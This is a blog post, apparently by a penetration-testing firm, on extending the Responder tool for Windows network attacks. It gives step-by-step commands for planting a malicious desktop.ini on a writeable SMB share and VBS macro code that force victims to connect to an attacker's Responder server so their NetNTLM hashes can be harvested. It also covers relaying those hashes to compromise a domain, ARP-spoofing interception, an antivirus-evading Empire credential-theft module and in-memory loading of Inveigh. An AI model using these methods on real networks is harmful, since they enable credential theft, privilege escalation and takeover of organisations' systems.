If you are not familiar with Responder already, we recommend
you learn the basics and read our intermediate guide here: From Beginner Responder to Intermediate – Utilising the Whole Suite.
Expanding the Suite – Application Specific
When targeting specific applications you can increase the
effectiveness of Responder significantly. For example; if you find a writeable
SMB share on a network that is heavily used by clients and admins you can
utilise that against the network with Responder. To do so you must first craft
a malicious Desktop.ini file. Instructions are below:
a.
Open a PowerShell window.
b.
Run mkdir <directory name>.
c.
Run attrib +s <directory name>.
d.
Enter the directory.
e.
Run echo [.ShellClassInfo] > desktop.ini.
f.
Run:
i.
For Windows Vista victim and above: echo IconResource=\\<Responder
server IP>\directory >> desktop.ini.
ii.
For Windows XP victim: echo IconFile=\\<Responder
server IP>\directory >> desktop.ini.
g.
Run attrib +s +h desktop.ini.
[.ShellClassInfo]
IconResource=\\<Responder server IP>\directory
Once this is complete, you can place the desktop.ini file
and the folder in which it is contained onto the writeable share. Any Windows
clients connecting to the share with Windows Explorer will automatically
attempt to resolve the icon of the folder; this will lead to a login attempt to
your SMB module in Responder. If Responder is running and you have set the
destination IP address correctly in the desktop.ini file you will be able to
harvest the NetNTLM hash of anyone browsing to this SMB share. You can pair
this technique with MultiRelay (usage discussed in previous article) for
maximum effect, if domain admins use this share and SMB signing is off on the
domain controller you will find it easy to conquer the entire network. If this is
not the case, you will be able to use this to gain significant lateral spread
and harvest some hashes for cracking while you are at it. Hash grabbing will
work across subnets with this method. Shown below is an example of what the
exploited SMB share should look like once you drop your malicious directory
with desktop.ini inside.
Another example of an application specific attack would be
using Microsoft Office macros. To create a malicious macro which will connect
to your Responder server enter this VBS code into the macro:
Set fso =
CreateObject("Scripting.FileSystemObject")
Set file =
fso.OpenTextFile("//<Responder server IP>/directory", 1)
You can then spread this Microsoft Office file however you
see fit, if you can get an admin to open it you may be able to escalate your
privileges or at least gain lateral spread and some more hashes for cracking!
These methods will also work across subnets, unlike
LLMNR/NBNS hash grabbing in most scenarios. Responder naturally relies upon
LLMNR and/or NBNS to direct victims to its fake servers for hash grabbing. These
two protocols only operate on a single subnet/domain. By shedding reliance upon
these protocols, we allow for hashes to be grabbed across subnets.
There are of course other application specific methods you
can utilise; in general if you can force Windows to connect to Responder with
NTLMSSP you will be able to get a hash as Windows will automatically hand over
credentials. Methods such as the file:// resource locator in HTML are disabled
in modern browsers, but there are plenty of other methods. This article: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
contains an impressive list of methods you could utilise against your target
network. It also deserves credit for being my original inspiration for the
desktop.ini method and has provided the creation steps for the two malicious
files above.
Expanding the Suite – ARP Spoofing
Whilst Responder is a powerful tool, it is generally sat
around waiting for victims to connect to it. This does decrease the speed of an
attack a great deal, especially when targeting a specific machine.
Additionally, Responder is unable to intercept correctly created SMB connections;
it can only intercept connections that send LLMNR/NBNS broadcasts. If you are
in a scenario where two SMB servers are syncing with each other using their
Administrator accounts and you are aware of this, Responder would normally be
unable to help you MITM this connection. With some extra help from an ARP
spoofing attack this is possible!
The article at http://g-laurent.blogspot.com/2016/10/introducing-responder-multirelay-10.html
contains a brief description of how to utilise ARP spoofing with Responder to
MITM the aforementioned scenario. Laurent Gaffie's blog is a good source of
information on Responder in general, should you require an explanation of the
basics.
Expanding the Suite – Your Own Code
The Responder tool is under a GPL v3 license, which means
you can do just about anything with the code so long as you ship it with the
license and provide credit. For more details read this page: https://github.com/lgandx/Responder/blob/master/LICENSE.
Thanks to this generous license we can take, adjust and use the Responder code
as we see fit.
For example, I have adjusted the Responder code to work with
Empire as a credential extraction module. The module takes the IP address of
the Empire server as an argument and uses it to force the victim to connect back
to Responder. You might assume that this is essentially redundant thanks to
tools like Mimikatz, however; the main advantage of this module is that it does
not require any privileged access, appears on the network as legitimate traffic
and is virtually undetectable by AntiVirus as it is all standard Windows
operation. By tricking Windows into handing over the NetNTLM hash for us we can
still gather hashes for lateral spread and cracking when we don't have any
privileges on our target machine. Installation is as easy as dropping the data
and lib directories into the directory of your Empire installation. You can
find the module here: https://www.secquest.co.uk/tools/HashGrabModule.zip
Since you can adapt and use the Responder code for your own
purposes, advanced users will find that Responder is incredibly flexible.
Responder's LLMNR and NBNS spoofing code could be utilised in a different
application for example, or one of the individual servers could be used in
something like the custom Empire module presented above.
Expanding the Suite – PowerShell and Pivoting
Whilst Responder is a powerful tool and can be used to pivot
into target networks using a technique described here, <https://ijustwannared.team/2017/05/27/responder-and-layer-2-pivots/>
if you already have access to PowerShell on a victim you can use that victim to
pivot your LLMNR and NBNS attacks into the target network. Inveigh is a tool
much like Responder and is controlled in a very similar manner, however;
Inveigh is written in PowerShell instead of Python. This makes Inveigh an
excellent choice for pivoting into Windows networks. Using IEX Inveigh can be
downloaded directly into RAM on the target machine and executed with a single
command.
Inveigh can be found here: https://github.com/Kevin-Robertson/Inveigh
An excellent list of different ways to download Inveigh to a
machine can be found here: https://gist.github.com/HarmJ0y/bb48307ffa663256e239
Inveigh operates in a very similar manner to Responder, and
should be simple to use if you already know how to use Responder. It is worth
bearing in mind that Inveigh has support for both privileged and unprivileged execution
modes. If you have gained access to a machine under an unprivileged user, you
may be able to use Inveigh to escalate your privileges. In conjunction with the
application specific methods listed above, Inveigh pivoting can be a powerful
and stealthy method of privilege escalation.
Summary
As you can see, Responder can become an extremely flexible
and powerful tool when used to its full potential. Our intermediate guide
covered the usage of what was provided, and this article has covered how you
can expand upon those tools. By no means are the above the only ways to expand
Responder, I highly encourage you to seek out your own methods. If you discover
any new and interesting ways of adapting Responder to a specific network I
would love to hear about them. Additionally, if you have any questions
regarding Responder I would be happy to answer them, you can contact me at: lewis@secquest.co.uk.
No comments:
Post a Comment